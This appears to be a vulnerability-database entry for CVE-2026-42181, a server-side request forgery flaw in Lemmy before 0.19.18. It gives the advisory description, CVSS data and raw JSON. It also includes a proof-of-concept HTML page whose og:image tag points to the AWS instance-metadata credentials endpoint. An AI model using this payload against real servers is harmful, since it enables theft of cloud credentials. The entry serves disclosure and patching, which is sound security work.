Security Vulnerability Report
中文
CVE-2026-42181 CVSS 6.5 MEDIUM

CVE-2026-42181

Published: 2026-05-08 20:16:31
Last Modified: 2026-05-11 17:16:33
Source: [email protected]

Description

Lemmy is a link aggregator and forum for the fediverse. Prior to version 0.19.18, Lemmy fetches metadata for user-supplied post URLs and, under the default StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction. As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users. This issue has been patched in version 0.19.18.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Lemmy < 0.19.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC Description: Malicious HTML file to be hosted on a public server. The attacker sets the og:image tag to an internal resource (e.g., AWS metadata). --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta property="og:title" content="SSRF PoC"> <!-- Pointing to an internal resource to trigger Lemmy to fetch it --> <meta property="og:image" content="http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"> <title>Lemmy CVE-2026-42181 PoC</title> </head> <body> <h1>If you see this, the page is hosted correctly.</h1> <p>Submit this URL to Lemmy to trigger the vulnerability.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42181", "sourceIdentifier": "[email protected]", "published": "2026-05-08T20:16:31.160", "lastModified": "2026-05-11T17:16:32.543", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lemmy is a link aggregator and forum for the fediverse. Prior to version 0.19.18, Lemmy fetches metadata for user-supplied post URLs and, under the default StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction. As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users. This issue has been patched in version 0.19.18."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/LemmyNet/lemmy/releases/tag/0.19.18", "source": "[email protected]"}, {"url": "https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq", "source": "[email protected]"}, {"url": "https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.